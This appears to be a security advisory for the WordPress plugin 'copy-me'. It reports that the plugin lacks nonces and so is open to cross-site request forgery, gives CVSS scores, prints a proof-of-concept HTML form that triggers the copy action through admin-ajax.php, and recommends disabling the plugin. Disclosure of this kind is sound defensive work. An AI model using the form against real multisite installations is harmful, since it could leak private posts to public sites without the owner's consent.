copy-me vulnerable to CSRF allowing unauthenticated attacker to copy posts

Score Vector Complexity Authentication Confidentiality Integrity Availability
Network Medium None None Partial None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.


This plugin does not use nonces. Copying posts could allow taking a secret post from a non-public site within a multisite installation and moving it to a public site.

Proof of concept

Click submit and it’ll copy post with ID 1 to blog/site with ID 1:

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php">
  <input type="text" name="action" value="copyme_copy_item">
  <input type="text" name="id" value="1">
  <input type="text" name="target" value="1">
  <input type="submit">

Mitigation/further actions

Disable the plugin. No fixed version is known.